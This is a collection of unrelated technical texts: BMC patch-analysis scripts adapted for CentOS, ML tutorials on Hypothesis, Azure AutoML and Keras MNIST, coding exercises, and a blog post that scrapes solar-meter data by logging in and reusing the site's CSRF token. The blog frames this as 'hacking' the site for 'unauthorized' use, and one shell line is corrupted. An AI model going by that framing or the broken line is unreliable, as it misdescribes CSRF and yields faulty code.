$os_version = $a[6];
}elsif($os_vendor eq "suse") {
$os_version = $a[4];
}
$os_version=~s/\..*//gi;
$os_version =~ s/AS//g;
The modified version looks like this:
my @a = split( " ", $os_relstring );
if($os_vendor eq "redhat"){
$os_version = $a[6];
}elsif($os_vendor eq "suse") {
$os_version = $a[4];
}elsif($os_vendor eq "cent") {
$os_version = $a[2];
$os_version = int $os_version;
}
$os_version=~s/\..*//gi;
$os_version =~ s/AS//g;
We're pulling the version from the 3rd position (array position 0 is the 1st position) here instead of the 7th or 4th.
The last modification is done to pull the name of the distribution from the /etc/redhat-release file. The original code block around line 770 looks like this:
if($os_relstring=~/Red Hat Linux Advanced Server release/gi){
$os_relstring='RHAS';
}elsif($os_relstring=~/Red Hat Enterprise Linux ES release/gi){
$os_relstring='RHES';
}elsif($os_relstring=~/Red Hat Enterprise Linux Server release/gi){
$os_relstring='RHES';
}elsif($os_relstring=~/SUSE LINUX Enterprise Server/gi){
$os_relstring='SLES';
}elsif($os_relstring=~/Red Hat Enterprise Linux AS release/gi){
$os_relstring='RHAS';
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux AS release/gi){
$os_relstring='OELAS';
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux Server release/gi){
$os_relstring='OELES';
}else{
display_err("($host) Unsupported Linux Release $os_relstring");
display_err("($host) Skipping this host");
print "($host) Exit Code 1n";
return 0;
}
We need to add a new section for CentOS based on the /etc/redhat-release file. The file contains something like
CentOS release 5.2 (Final)
so the 'release string' should be 'CentOS release'. The new section looks like:
...
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux AS release/gi){
$os_relstring='OELAS';
}elsif($os_relstring=~/Enterprise Linux Enterprise Linux Server release/gi){
$os_relstring='OELES';
}elsif($os_relstring=~/CentOS release/gi){
$os_relstring='COS';
}else{
display_err("($host) Unsupported Linux Release $os_relstring");
display_err("($host) Skipping this host");
print "($host) Exit Code 1n";
return 0;
}
Note: In 7.6, after you modify this file, you must overwrite the file in the Depot with this file. You can copy it over the file in <FS>/storage/scripts or you can cut and paste the contents into the file in the CM GUI. In 8.x we will be adding this to the depot later so you do not need to do anything yet.
linux-analysis.py
In this file we need to do something similar to what we did in the perl script above. First is the distribution name around line 450:
if os_relstr.count('Enterprise Linux Enterprise Linux Server release'):
    os_release='OELES';
if not os_release:
    print_error('Cannot resolve OS Release from /etc/redhat-release on host %s' %host)
We only need to add a line for CentOS:
if os_relstr.count('Enterprise Linux Enterprise Linux Server release'):
    os_release='OELES';
if os_relstr.count('CentOS release'):
    os_release='COS';
if not os_release:
    print_error('Cannot resolve OS Release from /etc/redhat-release on host %s' %host)
Then we need to handle the version around line 460:
temp = os_relstr.split(' ')
if os_release == 'SLES': ver_indx = 4
else: ver_indx = 6
os_version = temp[ver_indx].strip()
if not os_version:
    print_error('Cannot resolve OS Version from /etc/redhat-release on host %s' %host)
    print_error('Skipping host %s' %host)
With the CentOS check, it looks like:
temp = os_relstr.split(' ')
if os_release == 'SLES': ver_indx = 4
elif os_release == 'COS': ver_indx = 2
else: ver_indx = 6
os_version = temp[ver_indx].strip()
os_version = os_version.split(".")[0]
if not os_version:
    print_error('Cannot resolve OS Version from /etc/redhat-release on host %s' %host)
    print_error('Skipping host %s' %host)
In 8.2 you need to modify a blcli call as a command was removed. Around line 230 find:
ret = blcli.run(['Job', 'getAssociatedInstanceBean'])
if not ret.success():
    sys.stderr.write(str(ret.getError())+"\n")
    sys.exit(1)
job_timeout = ret.returnValue.getFullyResolvedPropertyValueAsString('JOB_TIMEOUT')
job_part_timeout = ret.returnValue.getFullyResolvedPropertyValueAsString('JOB_PART_TIMEOUT')
job_timeout = str(int(job_timeout)*timeout_percentage/100)
job_part_timeout = str(int(job_part_timeout)*timeout_percentage/100)
change this to
job_timeout = blcli.run(['Job', 'getPropertyValueAsString', 'JOB_TIMEOUT']).returnValue
job_part_timeout = blcli.run(['Job', 'getPropertyValueAsString', 'JOB_PART_TIMEOUT']).returnValue
job_timeout = str(int(job_timeout)*timeout_percentage/100)
job_part_timeout = str(int(job_part_timeout)*timeout_percentage/100)
linux-analyze.sh
Again, we need to identify the CentOS name. Around line 145 we have:
release="RHAS"
return 0
fi
echo "$os_rel_str" | grep -qi "Enterprise Linux Enterprise Linux Server release"
if ["$?" "0"]; then
release="RHES"
return 0
fi
return 1
}
This needs an addition:
release="RHAS"
return 0
fi
echo "$os_rel_str" | grep -qi "Enterprise Linux Enterprise Linux Server release"
if ["$?" h1. "0"]; then
release="RHES"
return 0
fi
echo "$os_rel_str" | grep -qi "CentOS release"
if ["$?" "0"]; then
release="COS"
return 0
fi
return 1
}
linuxrepo.conf
The new shorthand identifier we've chosen is COS. Therefore in the linuxrepo.conf we should have a line like:
cos5=//blapp/u01/patch/cos53,COS5x86
That creates a repo tag for CentOS 5, stored in /u01/patch/cos53 on the server named 'blapp' for the x86 architecture. For x86_64 you would have something like:
cos5x64=//blapp/u01/patch/cos53,COS5x86_64
Creating NSH Scripts and NSH Script Jobs for 8.x
In the TrueSight Server Automation Workspace, create folders for the Linux VPC. You should already have folders for HPUX or AIX depending on what was installed as required previously. You can do this manually, or use this script:
#!/bin/nsh
blcli_setoption serviceProfileName defaultProfile
blcli_setoption roleName BLAdmins
blcli_connect
if [ `uname -s` = "WindowsNT" ]
then
RSC="/C/Windows/rsc/HOME"
else
RSC="/usr/lib/rsc/HOME"
fi
scriptLocation="`cat ${RSC}`/patch"
createDepotFolders()
{
# Depot Folders
blcli_execute DepotGroup createGroupWithParentName "Linux Patch Analysis" "/Patch Analysis Items"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis" "Everyone" 'DepotFolder.*'
blcli_execute DepotGroup createGroupWithParentName "Patches" "/Patch Analysis Items/Linux Patch Analysis"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis/Patches" "Everyone" 'DepotFolder.*'
blcli_execute DepotGroup createGroupWithParentName "BLPackages" "/Patch Analysis Items/Linux Patch Analysis/Patches"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis/Patches/BLPackages" "Everyone" 'DepotFolder.*'
blcli_execute DepotGroup createGroupWithParentName "Scripts" "/Patch Analysis Items/Linux Patch Analysis"
blcli_execute DepotGroup addPermission "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Everyone" 'DepotFolder.*'
}
createJobFolders()
{
# Job Folders
blcli_execute JobGroup createGroupWithParentName "Linux Patch Analysis" "/Patch Analysis Jobs"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis" "Everyone" 'JobFolder.*'
blcli_execute JobGroup createGroupWithParentName "Patch Analysis Jobs" "/Patch Analysis Jobs/Linux Patch Analysis"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs" "Everyone" 'JobFolder.*'
blcli_execute JobGroup createGroupWithParentName "Patch Deploy Jobs" "/Patch Analysis Jobs/Linux Patch Analysis"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs" "Everyone" 'JobFolder.*'
blcli_execute JobGroup createGroupWithParentName "Deploy" "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs"
blcli_execute JobGroup addPermission "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs/Deploy" "Everyone" 'JobFolder.*'
}
createNSHScript()
{
# NSH Scripts
blcli_execute NSHScript addNSHScriptToDepotByGroupName "/Patch Analysis Items/Linux Patch Analysis/Scripts" 3 "${scriptLocation}/linuxpu/Scripts/Perl/linuxpc.pl" "Linux Patch Analysis" "Linux Patch Analysis"
}
setScriptOptions()
{
# NSH Scripts Options
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "hosts" "Target servers to analyze" "f" "%f" "3"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "local directory" "Scripts directory" "w" "${scriptLocation}/linuxpu/Work" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Linux Patch Repository" "Linux Patch Repository" "l" "UPDATE-AFTER-INSTALL" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Analysis Type" "Analysis Type. Default to repo" "a" "repo" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "script mode" "ap- for Analysis and Packaging and Creation of deploy jobs, a - for only analyis and p - for Only Packaging and delpoy job creation" "m" "ap" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Depot Patch Folder Name" "Depot Patch Folder Name to store patches" "D" "/Patch Analysis Items/Linux Patch Analysis/Patches" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Deploy Job Folder Name" "Deploy Job Folder Name to store Deploy Jobs" "J" "/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Package exclude file" "NSH path to file (one package name per line) of packages to exclude from analysis." "e" "" "5"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "URL_TYPE" "URL Type" "T" "AGENT_COPY_AT_STAGING" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Network URL" "ftp/http URLs to the yummified Patch Repository" "U" "" "5"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Policy Name" "Policy Name" "P" "Linux Patch Analysis" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Debug Mode" "Debug Mode (0/1)" "d" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Auto-Execute Deploy Batch Job" "Enable/disable Auto-Execute Deploy Batch Job." "X" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Multi Data Store mode" "Enable/Disable Multi Data Store mode(0/1)" "b" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Shared Payload mode" "Enable/Disable Shared Payload mode(0/1)" "S" "0" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Max number of targets to process in parallel per platform" "Max number of targets to process in parallel per platform" "p" "10" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Update only flag" "Update only flag" "u" "1" "7"
blcli_execute NSHScript addNSHScriptParameterByGroupAndName "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "Errata Based Analysis" "Errata Based Analysis" "E" "0" "7"
}
createScriptJob()
{
# NSH Script Job
blcli_execute NSHScriptJob createNSHScriptJob "/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs" "Linux Patch Analysis Job" "Linux Patch Analysis" "/Patch Analysis Items/Linux Patch Analysis/Scripts" "Linux Patch Analysis" "`hostname`" 30
blcli_execute NSHScriptJob getDBKeyByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs" "Linux Patch Analysis Job"
blcli_storeenv jobKey
blcli_execute Job clearTargetServers ${jobKey}
blcli_execute NSHScriptJob createNSHScriptJob "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" "Apply Return Codes" "/Patch Analysis Items" "Apply Return Codes" "`hostname`" 30
blcli_execute NSHScriptJob getDBKeyByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes"
blcli_storeenv jobKey
blcli_execute Job clearTargetServers ${jobKey}
}
setJobOptions()
{
# NSH Script Options
blcli_execute NSHScriptJob addNSHScriptParameterValueByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" 1 "Linux"
blcli_execute NSHScriptJob addNSHScriptParameterValueByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" 2 "/Patch Analysis Items/Linux Patch Analysis/Patches"
blcli_execute NSHScriptJob addNSHScriptParameterValueByGroupAndName "/Patch Analysis Jobs/Linux Patch Analysis" "Apply Return Codes" 3 "%f"
}
createEO()
{
blcli_execute ExtendedObjectClass createExtendedObject "Linux Patch Analysis Results" "Linux Patch Analysis" "perl \"${scriptLocation}/linux_cust.pl\" '??TARGET.NAME??'" csv.gm Linux false
}
createDepotFolders
createJobFolders
createNSHScript
setScriptOptions
createScriptJob
setJobOptions
createEO
Workspace Folders
Depot:
/Patch Analysis Items/Linux Patch Analysis
/Patch Analysis Items/Linux Patch Analysis/Patches
/Patch Analysis Items/Linux Patch Analysis/Patches/BLPackages
/Patch Analysis Items/Linux Patch Analysis/Scripts
Jobs:
/Patch Analysis Jobs/Linux Patch Analysis
/Patch Analysis Jobs/Linux Patch Analysis/Patch Analysis Jobs
/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs
/Patch Analysis Jobs/Linux Patch Analysis/Patch Deploy Jobs/Deploy
NSH Script and Script Job Creation
Create a new NSH Script object in the Depot Workspace folder /Patch Analysis Items/Linux Patch Analysis/Scripts named Linux Patch Analysis, using the linuxpc.pl script.
This should be a Type 4 script (Execute the script using the PERL interpreter...).
Create the following options on the NSH script:
The -w option should match your install directory
The -l option should contain the repositories defined in the linuxrepo.conf file
The -P option should be the "Policy Name" that you want to show up in Reporting.
The
Extended Object
To view the VPC results, you must manually create the Extended Object in the Configuration Object Dictionary.
Change the path to match your particular installation path.
Create the Repository
Getting the files
The RedHat Download Manager will not download CentOS or other RPMs. It will, however, yummify the repositories just fine.
There are some options to download the repos:
Manually use rsync or wget or some other tool to pull the RPMS from a mirror on the internet.
Use a tool like mrepo http://dag.wieers.com/home-made/yam to manage the repo
Yummify the Repo
Copy the RedhatRepositoryManager.zip from the <install>/patch/SupportFiles directory to your RedHat helper system. Extract this somewhere on the system. Make sure your java executable is in your path.
After you download the repos you must run RedHatRepositoryManager -yummifyrepo against the repo; the VPC creates its own custom metadata files that are separate from the standard files that createrepo generates (they are named differently but contain the same content). For example, if your repository is stored in /u01/patch/cos53 you would run RedHatRepositoryManager -yummifyrepo -repoLocation /u01/patch/cos53.
|
In September, Stripe is supporting the development of Hypothesis, an open-source testing library for Python created by David MacIver. Hypothesis is the only project we’ve found that provides effective tooling for testing code for machine learning, a domain in which testing and correctness are notoriously difficult.
Instead of unit tests, Hypothesis lets you define certain properties of your functions that should hold true for every input. A property is a statement like “My sorting function should return a sorted list given any input list.” Every time the tests run, Hypothesis attempts to prove your properties wrong by feeding in thousands of automatically generated example inputs. If any of your properties break, Hypothesis returns the smallest possible example of failing input.
Here’s an example of a Hypothesis test:
from hypothesis import given
import hypothesis.strategies as st
@given(st.lists(st.integers()))
def test_reversing_twice_gives_same_list(xs):
# This will generate lists of arbitrary length (usually between
# 0 and 100 elements) whose elements are integers.
ys = list(xs)
ys.reverse()
ys.reverse()
assert xs == ys
This style of testing is a perfect match for machine learning workflows. We use machine learning to make products like Radar, which helps hundreds of thousands of Stripe users fight fraud at a global scale, more effective. Testing machine learning code is especially critical when your systems can have material consequences for users. Every day, we train many models on large datasets, but unit tests alone can’t capture all of the complexity of the possible input data. For the past few months we’ve been using Hypothesis to generate input data for our tests of the models behind Radar.
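As a flavor of what such a property looks like for preprocessing code, here is a small illustrative test; min_max_scale is a made-up example function, not Stripe's code:
from hypothesis import given
import hypothesis.strategies as st

def min_max_scale(xs):
    # toy feature-scaling helper, used only for this example
    lo, hi = min(xs), max(xs)
    if lo == hi:
        return [0.0 for _ in xs]
    return [(x - lo) / (hi - lo) for x in xs]

@given(st.lists(st.floats(min_value=-1e6, max_value=1e6), min_size=1))
def test_scaled_values_stay_in_unit_interval(xs):
    # Hypothesis generates many input lists and shrinks any failing example
    assert all(0.0 <= v <= 1.0 for v in min_max_scale(xs))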
While working with Hypothesis, we found that support for property-based testing with Pandas and NumPy wasn’t built out. We’re excited to support the project in making concrete progress towards integrating with these two foundational, commonly-used libraries in Python’s ML toolkit.
We plan to use Hypothesis more broadly at Stripe and hope that the project’s development over the next few months also helps other companies reliably integrate machine learning into more products.
At Stripe, we regularly contribute to open-source projects and rely on open-source software for developing many different parts of our stack. We have a particularly strong interest in areas where the right tooling can provide outsized leverage to the larger developer community. If you’re working on such a project, we’d love to hear from you!
|
Predicting House Prices
Using Azure AutoML
Posted by Greg Krause on Jan 08, 2021
Gartner places AI Engineering in the Top Strategic Technology Trends for 2021.
Microsoft’s cloud solution for this, Azure Machine Learning (AML), is a suite of tools that “empower developers and data scientists with a wide range of productive experiences for building, training, and deploying machine learning models faster”.
In this post, we will utilize a subset of AML’s features to tackle the House Prices - Advanced Regression Techniques prediction competition on Kaggle.
What is AutoML?
According to the Azure concept page, AutoML is the “process of automating the time consuming, iterative tasks of machine learning model development”.
The models created by Azure AutoML can then be registered as a service, or referenced for baseline performance expectations.
Prerequisites
The code snippets in this post are intended to be run from an AML Jupyter Notebook. For more information, please see Tutorial: Get started with Azure Machine Learning in Jupyter Notebooks.
Create a new AML notebook named kaggle-house-prices-advanced-regression-techniques.ipynb
Download the competition dataset
AML Workspace File Structure
house-prices-advanced-regression-techniques/
    kaggle-house-prices-advanced-regression-techniques.ipynb
    data/
        test.csv        # From competition dataset
        train.csv       # From competition dataset
        submission.csv  # We will create this file
Using AML Jupyter Python Notebook
Import Dependencies
from azureml.core import Dataset, Experiment, Workspace
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
from azureml.core.conda_dependencies import CondaDependencies
from azureml.core.runconfig import RunConfiguration
from azureml.train.automl import AutoMLConfig
import logging
import pandas as pd
Load Data and Fill NA/NaN Values with 0
train_df = pd.read_csv('./data/train.csv').fillna(0)
test_df = pd.read_csv('./data/test.csv').fillna(0)
Upload Data to Azure Blob
ws = Workspace.from_config()
default_store = ws.get_default_datastore()
default_store.upload_files(
    ['./data/train.csv'],
    target_path='kaggle-house-prices-training',
    overwrite=True,
    show_progress=True
)
Create and Register Training Dataset
Datasets are used to “access data for your local or remote experiments with the AML Python SDK”.
train_dataset = Dataset.Tabular.from_delimited_files(
    default_store.path('kaggle-house-prices-training')
)
train_dataset = train_dataset.register(ws, 'kaggle-house-prices-training')
Create Compute Cluster If Not Exists
AML Compute Cluster is “managed-compute infrastructure that allows you to easily create a single or multi-node compute”.
We will create a modest, one node sandbox “cluster”. This compute cluster will automatically zero-scale when not in use.
amlcompute_cluster_name = "sandbox"
try:
    aml_compute = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)
except ComputeTargetException:
    print('Compute cluster %s not found. Attempting to create it now.' % amlcompute_cluster_name)
    compute_config = AmlCompute.provisioning_configuration(
        vm_size='Standard_DS2_v2',
        max_nodes=1
    )
    aml_compute = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)
aml_compute.wait_for_completion(show_output=True)
Define Compute RunConfiguration
The RunConfiguration can be used to define any conda or pip python packages required.
aml_run_config = RunConfiguration()
aml_run_config.target = aml_compute
aml_run_config.environment.docker.enabled = True
aml_run_config.environment.python.user_managed_dependencies = False
aml_run_config.environment.python.conda_dependencies = CondaDependencies.create(
    conda_packages=['packaging']
)
Define AutoMLConfig
At the time of writing, Azure AutoML supports classification, regression, and forecasting ML task types. To predict a continuous, non-discrete home value, we will use a regression configuration.
We will utilize normalized_root_mean_squared_error as our loss function, paired with enable_early_stopping for cost savings.
To view all available hyperparameters and AutoML config options, see AutoMLConfig Class Documentation
automl_settings = {
    "n_cross_validations": 3,
    "primary_metric": 'normalized_root_mean_squared_error',
    "enable_early_stopping": True,
    "experiment_timeout_hours": 1,
    "max_concurrent_iterations": 4,
    "max_cores_per_iteration": -1,
    "verbosity": logging.INFO,
}
automl_config = AutoMLConfig(
    task = 'regression',
    compute_target = aml_compute,
    training_data = train_dataset,
    label_column_name = 'SalePrice',
    **automl_settings
)
Create Experiment
experiment_name = 'kaggle-house-prices-training'
experiment = Experiment(workspace=ws, name=experiment_name)
Run AutoML Training Job Experiment and Wait for Completion
If you utilized the settings in this post, the AutoML job should take approximately 40 minutes to complete.
remote_run = experiment.submit(automl_config, show_output=False)
remote_run.wait_for_completion()
Retrieve the Best Model
Azure AutoML tests a variety of ML algorithms and hyperparameters to find the best performing values. Here, we will retrieve the model with the lowest normalized_root_mean_squared_error (as defined in our AutoMLConfig).
best_run, fitted_model = remote_run.get_output()
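If you also want to keep the winning model around for later deployment, the run can register it in the workspace. A minimal sketch; the model name is arbitrary and the exact call may differ between SDK versions:
# Register the best model from the AutoML run (model name is just an example)
registered_model = remote_run.register_model(model_name='kaggle-house-prices-automl')
print(registered_model.name, registered_model.version)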
Generate Predictions
Generate SalePrice predictions, select the desired fields (as defined by the Kaggle competition), and write to a local csv. This file can then be submitted via the competition site.
test_df['SalePrice'] = fitted_model.predict(test_df)
kaggle_submission = test_df[['Id', 'SalePrice']]
kaggle_submission.to_csv('./data/submission.csv', index=False)
Results
The model created managed to obtain a Root-Mean-Squared-Error (RMSE) score of 0.14511.
If we take a look at the leaderboard score distribution for this competition, it seems as though scores tend to top out around 0.11. While this model didn’t place in the top 10 (or top 1,000), its RMSE of 0.14 comes close behind.
Parting Thoughts
AutoML appears to live up to its promise of “automating the time consuming, iterative tasks of machine learning model development”. It may not win Kaggle competitions, but it sure is a solid start.
|
One of the capabilities of deep learning is image recognition. The "hello world" of object recognition for machine learning and deep learning is the MNIST dataset for handwritten digit recognition.
In this article, we are going to classify MNIST Handwritten digits using Keras.
You can download the code from Google Colab.
Description of the MNIST Handwritten Digit.
The MNIST Handwritten Digit dataset is used for evaluating machine learning and deep learning models on the handwritten digit classification problem. It is a dataset of 60,000 small square 28×28 pixel grayscale images of handwritten single digits between 0 and 9.
Import the TensorFlow library
import tensorflow as tf # Import tensorflow library
import matplotlib.pyplot as plt # Import matplotlib library
import numpy as np # Import numpy (used later for np.argmax)
Create a variable named mnist and set it to an object of the MNIST dataset from the Keras library, then unpack it into a training dataset (x_train, y_train) and a testing dataset (x_test, y_test):
mnist = tf.keras.datasets.mnist # Object of the MNIST dataset
(x_train, y_train),(x_test, y_test) = mnist.load_data() # Load data
Preprocess the data
To make sure that our data was imported correctly, we are going to plot the first image from the training dataset using matplotlib:
plt.imshow(x_train[0], cmap="gray") # Import the image
plt.show() # Plot the image
Before we feed the data into the neural network we need to normalize it by scaling the pixel values to the range 0 to 1 instead of 0 to 255, which reduces the computational power the neural network needs:
# Normalize the train dataset
x_train = tf.keras.utils.normalize(x_train, axis=1)
# Normalize the test dataset
x_test = tf.keras.utils.normalize(x_test, axis=1)
Build the model
Now, we are going to build the model or in other words the neural network that will train and learn how to classify these images.
It is worth noting that the layers are the most important part of building an artificial neural network, since they extract the features of the data.
First and foremost, we start by creating a model object that lets you add the different layers.
Second, we are going to flatten the data, which in this case is the image pixels. The images are 28×28 dimensional, and we need to make them 1×784 dimensional so the input layer of the neural network can read them. This is an important concept you need to know.
Third, we define input and a hidden layer with 128 neurons and an activation function which is the relu function.
And lastly, we create the output layer with 10 neurons and a softmax activation function that transforms the scores returned by the model into values that can be interpreted by humans.
#Build the model object
model = tf.keras.models.Sequential()
# Add the Flatten Layer
model.add(tf.keras.layers.Flatten())
# Build the input and the hidden layers
model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))
model.add(tf.keras.layers.Dense(128, activation=tf.nn.relu))
# Build the output layer
model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax))
Compile the model
Since we have finished building the neural network, we need to compile the model by adding a few parameters that tell the neural network how to start the training process.
First, we add the optimizer, which will update the parameters of the neural network to fit our data.
Second, the loss function, which tells you how well your model is performing.
Third, the metrics, which give an indicative measure of the quality of the model.
# Compile the model
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
Train the model
We are ready to train our model. We call the fit method and feed it the training data, the labels that correspond to the training dataset, and how many epochs it should run, i.e. how many passes it should make over the training data.
model.fit(x=x_train, y=y_train, epochs=5) # Start training process
Evaluate the model
Let’s see how the model performs after the training process has finished.
# Evaluate the model performance
test_loss, test_acc = model.evaluate(x=x_test, y=y_test)
# Print out the model accuracy
print('\nTest accuracy:', test_acc)
It shows that the neural network has reached 97.39% accuracy, which is pretty good since we trained the model with just 5 epochs.
Make predictions
Now, we will start making a prediction by importing the test dataset images.
predictions = model.predict([x_test]) # Make prediction
We are going to make a prediction for numbers or images that the model has never seen before.
For instance, we try to predict the number that corresponds to the image number 1000 in the test dataset:
print(np.argmax(predictions[1000])) # Print out the number
As you can see, the prediction is the number nine, but how can we make sure that this prediction is correct? Well, we need to plot image number 1000 in the test dataset using matplotlib:
plt.imshow(x_test[1000], cmap="gray") # Import the image
plt.show() # Show the image
Congratulations, the prediction was correct, which means that our model works well for classifying handwritten-digit images.
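If you want to reuse the trained network later without retraining it, you can also save it to disk; a small sketch (the filename is just an example):
model.save("mnist_model.h5")  # Save the trained model to a file
reloaded_model = tf.keras.models.load_model("mnist_model.h5")  # Load it back later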
Thanks For Reading and “Happy Coding ❤️”
Note: This is a guest post, and opinion in this article is of the guest writer. If you have any issues with any of the articles posted at www.marktechpost.com please contact at [email protected]m
|
Here's my solution for LeetCode's Two Sum problem -- would love feedback on (1) code efficiency and (2) style/formatting.
Problem:
Given an array of integers, return indices of the two numbers such that they add up to a specific target.
You may assume that each input would have exactly one solution, and you may not use the same element twice.
Example:
Given nums = [2, 7, 11, 15], target = 9,
Because nums[0] + nums[1] = 2 + 7 = 9, return [0, 1].
My solution:
def twoSum(nums, target):
    """
    :type nums: List[int]
    :type target: int
    :rtype: List[int]
    """
    num_lst = list(range(len(nums)))
    for indx, num in enumerate(num_lst):
        for num_other in num_lst[indx+1:]:
            if nums[num] + nums[num_other] == target:
                return [num, num_other]
            else:
                continue
    return None
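For comparison, a single-pass dictionary lookup avoids the nested loop and runs in O(n) instead of O(n^2); a sketch of that approach:
def two_sum_linear(nums, target):
    """Return indices of the two numbers adding up to target, or None."""
    seen = {}  # value -> index where it was seen
    for i, num in enumerate(nums):
        complement = target - num
        if complement in seen:
            return [seen[complement], i]
        seen[num] = i
    return None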
|
As we saw with the merge point problem, more than one node can reference another node. These references can create a cycle in the linked list where the traversal will loop back on itself.
# a -> b -> c -> d
#      ^         |
#      +---------+
# 'd' node's next points to 'b' node
Write a function that detects whether a cycle exists in a linked list. A cycle exists if traversing the linked list visits the same node more than once.
A cycle does not mean repeated values. Avoid this pitfall in your implementation by comparing the Node instances themselves, not their values!
a = Node('a')
other_a = Node('a')
a.val == other_a.val
# True
a == other_a
# False
To recap:
write a function: has_cycle().
has_cycle() takes an instance of LinkedList as the argument.
return a Boolean which indicates whether a cycle exists.
Instructions
1.
Solve this problem and pass the tests. If you need help, check out the hint!
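If you get stuck, one possible sketch uses Floyd's tortoise-and-hare technique. It assumes the LinkedList instance exposes a head attribute and that nodes link to each other via next (adjust to the actual classes used in the exercise):
def has_cycle(linked_list):
    # Two pointers advance at different speeds; they can only meet if a cycle exists.
    slow = linked_list.head
    fast = linked_list.head
    while fast is not None and fast.next is not None:
        slow = slow.next
        fast = fast.next.next
        if slow is fast:  # compare Node instances, not their values
            return True
    return False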
|
So the other day I wanted to start working with Matplotlib, a Python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms.
But to plot data and create graphs you need one thing! Data! So I was thinking about plotting my solar panel data, but there was one small problem. I did not have access to the raw data. One online solar panel service, however, did have my data stored in XLS (Excel) files, but because I did not have a pro version I could not get data older than one year.
So I decided to hack and scrape the site with python.
Hacking the site is pretty easy. The owner did a decent job of keeping you from getting the data through the browser, as you cannot click back to previous years, but the underlying XLS files are not secured. So I only had to find out what the URLs were and the scraping could start.
install requirements
So for this script to run you need two items to install in your python environment.
requests, to actually get the data from the URLs, and BeautifulSoup (bs4) to scrape the data from the page.
You need bs4 because slimmemeterportal works with a CSRF code (a code generated each time you visit the page). A CSRF token is generated for the forms and must be tied to the user's session. It is sent along with requests to the server, which uses the token to validate them. This is one way of protecting against CSRF; another would be checking the referrer header.
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF(sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.
So guess what? I can hack myself around this and still use the data in an unauthorized way.
Okay, so far for the boring stuff, just install the two packages.
pip install requests
pip install bs4
Filling in the needed vars
In my script there are 3 vars you have to fill in.
Your slimmemeterportal.nl username, your slimmemeterportal.nl password, and the year you want the scraping to start.
username = "" # slimmemeterportal username password = "" # password start_year = "" # year your started measurements
And that’s it! Let the scraping begin!!!
But wait! How does this work.
Well it’s pretty easy!
This script uses your login name and password to login and get the user credentials it needs.
r = s.get(start_url) # Get first page for the csrf code (generated each time)
